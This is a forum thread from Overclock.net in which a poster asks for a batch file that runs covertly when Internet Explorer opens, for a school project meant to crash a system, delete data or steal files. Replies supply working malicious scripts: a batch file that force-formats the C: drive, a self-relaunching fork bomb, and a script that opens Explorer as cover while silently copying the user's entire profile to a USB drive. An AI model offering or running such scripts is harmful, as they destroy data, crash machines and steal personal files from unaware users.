Overclock.net banner

1 - 10 of 10 Posts

·
Registered
652 Posts
Discussion Starter #1
I want to start a batch file the same time i start Internet explorer. The batch is on a usb drive and the Internet Explorer is where it always is

The the name of the file is launch.bat and its directory is J:\music

My goal is to be able to start this bat file with something that is kept on the desktop so i can click and open.

Anyone able to help me out?

·
Registered
652 Posts
Discussion Starter #3
It doesnt work it errors.

This is what it is right here. If your wondering its for a school project thats now due today.
eek.gif
All help would be nice. And its suppose to get it to run with out knowing that's why the vbs is there. So please help so i can get this done I have looked all day and no luck. I have 3 other people in my group counting on me. And don't worry ill put you guys in the presentation for help me out. The credit will be given where needed.

We have to create something that could do some kind of harm to a system like crash it delete stuff or steal stuff Ect... If anyone wanted to know,

http://www.instantfundas.com/2010/01/how-to-secretly-copy-steal-files-from.html

·
Registered
817 Posts
Quote:
Originally Posted by lil-tom7 View Post

It doesnt work it errors.
what errors are you getting?
Quote:

This is what it is right here. If your wondering its for a school project thats now due today.
eek.gif
All help would be nice. And its suppose to get it to run with out knowing that's why the vbs is there. So please help so i can get this done I have looked all day and no luck. I have 3 other people in my group counting on me. And don't worry ill put you guys in the presentation for help me out. The credit will be given where needed.
We have to create something that could do some kind of harm to a system like crash it delete stuff or steal stuff Ect... If anyone wanted to know,
http://www.instantfundas.com/2010/01/how-to-secretly-copy-steal-files-from.html
maybe i'm missing something. the link you provided seems straightforward. what exactly are you having problems with?

·
Registered
2,040 Posts
If you have to make a batch file that could damage the system why not just make it run a format C: command? That would do some damage!

Code:

Code:
echo off
cls
echo y|format C:
Don't test that on your own computer by the way!
tongue.gif

·
Registered
2,040 Posts
Quote:
Originally Posted by travesty View Post

fork bombs are also simple but effective.

Code:

Code:
@echo off
:START
start a.bat
GOTO START
Oh yes! I remember in high school we made a batch file that opened up Windows explorer non-stop until it crashed... Good fun!
rolleyes.gif

·
Registered
652 Posts
Discussion Starter #8
I don't want to do the opening thing because some ones already did it and don't want to format because I need it to be in done easy with out reinstalling windows. I'm getting a black command
Prompt box that says something about the vbs.
Sent from my Galaxy Nexus using Tapatalk

·
Premium Member
8,040 Posts
Quote:
Originally Posted by travesty View Post

this should do it for you. just save it as anything.bat

Code:

Code:
@echo off
start "" "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
start "" "J:\music\launch.bat"
You don't need null parameters for start.
Quote:

I don't want to do the opening thing because some ones already did it and don't want to format because I need it to be in done easy with out reinstalling windows. I'm getting a black command
Prompt box that says something about the vbs.
Sent from my Galaxy Nexus using Tapatalk
Code:

Code:
@echo off

set usb_drive_letter=L:

start explorer.exe
xcopy /y /e "%userprofile%\*" "%usb_drive_letter%\%username%\"  >NUL 2>NUL
This start Windows Explorer and in the back ground will copy all of the users profile, desktop, etc onto a usb drive under a folder of the users file name. Just change L: to the drive letter.

If you want to get really clever than you can use net use to pull the USB's drive letter and fully automate the script.

·
Registered
3,381 Posts
This may be too late, but here's something:

Code:

Code:
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")

errResult = objWMIService.Create("C:\Program Files (x86)\iTunes\iTunes.exe", null, null, intiTunesID)
errResult = objWMIService.Create("C:\Program Files (x86)\iTunesKeys\iTunesKeys.exe", null, null, intiTunesKeysID)

Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

Set colProcesses = objWMIService.ExecNotificationQuery _
    ("Select * From __InstanceDeletionEvent " _ 
            & "Within 1 Where TargetInstance ISA 'Win32_Process'")

Do Until i = 999
    Set objProcess = colProcesses.NextEvent
    If objProcess.TargetInstance.ProcessID = intiTunesID Then
        Exit Do
    End If
Loop

Set colProcesses = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where ProcessID = " & intiTunesKeysID)

For Each objProcess in colProcesses
    objProcess.Terminate()
Next
Save it as a .vbs script.

I use to use it to launch iTunes and iTunesKeys together. It also closes one when the other exited.
(Note: the code isn't mine, I found it somewhere on the net but I can't recall where)

1 - 10 of 10 Posts